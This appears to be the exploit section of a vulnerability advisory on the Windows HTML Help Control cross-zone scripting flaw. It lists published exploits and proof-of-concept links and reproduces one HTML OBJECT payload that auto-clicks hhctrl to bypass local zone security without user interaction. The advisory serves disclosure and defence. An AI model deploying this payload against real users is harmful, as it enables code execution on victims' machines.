|
Microsoft Windows HTML Help Control Cross-Zone Scripting Vulnerability
A reliable exploit (injecthh_op_2-code_by_liudieyu.zip) has been made available by Liu Die Yu <liudieyu@umbrella.name>; the payload.exe file has been removed from this archive. Further details can be found in the associated discussion reference. An exploit has been published on the following Web page: http://www.malware.com/noceegar.html An additional proof of concept (files.zip) has been made available by Michael Evanchik <mcbain@aol.com>, instructions on how to configure this proof of concept can be found in the associated message reference: Additional proof of concept allows for the execution of arbitrary script code in other domains: http://www.persiax.com/pocs/htmlhelp/cs.htm http://www.persiax.com/pocs/htmlhelp/cz.htm The following proof of concept provided by Paul <paul@greyhats.cjb.net>, allows for local zone security bypass and eliminates user interaction: &lt;OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm"> &lt;/OBJECT&gt; &lt;script&gt; hhctrl.HHClick(); &lt;/script&gt; Another proof of concept exploit has been made available by Greyhats that leverages this issue. The exploit can be found here. Please note that this exploit has not been verified by Symantec. http://freehost07.websamba.com/greyhats/sp2rc.htm A new proof of concept has been made available that allows applications to be executed with parameters: http://www.freewebs.com/shreddersub7/htm.htm This exploit has not been tested or verified by Symantec and is currently under analysis. This record will be updated if new information becomes available. Further exploit code: |
|
 Privacy Statement |
